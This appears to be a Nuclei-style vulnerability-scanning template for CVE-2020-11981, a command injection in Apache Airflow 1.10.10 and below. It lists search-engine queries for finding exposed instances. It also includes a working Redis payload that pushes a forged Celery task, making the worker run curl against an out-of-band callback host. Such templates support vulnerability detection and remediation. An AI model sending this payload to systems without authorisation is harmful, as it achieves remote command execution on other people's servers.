id: CVE-2020-11981

info:
  name: Apache Airflow <=1.10.10 - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
  remediation: Upgrade apache-airflow to version 1.10.11 or higher.
  reference:
    - https://github.com/apache/airflow/pull/9178
    - https://github.com/vulhub/vulhub/tree/master/airflow/CVE-2020-11981
    - https://lists.apache.org/thread.html/r7255cf0be3566f23a768e2a04b40fb09e52fcd1872695428ba9afe91%40%3Cusers.airflow.apache.org%3E
    - https://github.com/t0m4too/t0m4to
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-11981
    cwe-id: CWE-78
    epss-score: 0.93315
    epss-percentile: 0.99068
    cpe: cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: apache
    product: airflow
    shodan-query:
      - product:"redis"
      - http.title:"airflow - dags" || http.html:"apache airflow"
      - http.title:"sign in - airflow"
    fofa-query:
      - apache airflow
      - title="airflow - dags" || http.html:"apache airflow"
      - title="sign in - airflow"
    google-query:
      - intitle:"airflow - dags" || http.html:"apache airflow"
      - intitle:"sign in - airflow"
  tags: cve,cve2020,network,redis,unauth,apache,airflow,vulhub,intrusive,tcp
variables:
  data: "*3\r

    $5\r

    LPUSH\r

    $7\r

    default\r

    $936\r

    {\"content-encoding\": \"utf-8\", \"properties\": {\"priority\": 0, \"delivery_tag\": \"f29d2b4f-b9d6-4b9a-9ec3-029f9b46e066\", \"delivery_mode\": 2, \"body_encoding\": \"base64\", \"correlation_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"delivery_info\": {\"routing_key\": \"celery\", \"exchange\": \"\"}, \"reply_to\": \"fb996eec-3033-3c10-9ee1-418e1ca06db8\"}, \"content-type\": \"application/json\", \"headers\": {\"retries\": 0, \"lang\": \"py\", \"argsrepr\": \"(100, 200)\", \"expires\": null, \"task\": \"airflow.executors.celery_executor.execute_command\", \"kwargsrepr\": \"{}\", \"root_id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"parent_id\": null, \"id\": \"ed5f75c1-94f7-43e4-ac96-e196ca248bd4\", \"origin\": \"gen1@132f65270cde\", \"eta\": null, \"group\": null, \"timelimit\": [null, null]}, \"body\": \""
  encode1: '[[["curl", "http://'
  encode2: '"]], {}, {"chain": null, "chord": null, "errbacks": null, "callbacks": null}]'
  end: '"}'
tcp:
  - inputs:
      - data: "{{data+base64(encode1+'{{interactsh-url}}'+encode2)+concat(end+ '\r

          ')}}"
        read: 1024
    host:
      - "{{Hostname}}"
      - "{{Host}}:6379"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"
# digest: 4a0a00473045022100aff8fbe7f62bca05b0a3fa63d1a8918e35f71377dd19c5be43e22541cfeeddb202203672beec85ae4ba8f222dc4cac2a57879abbce3ad9712bd31ee37bf90b052adf:922c64590222798bb761d5b6d8e72950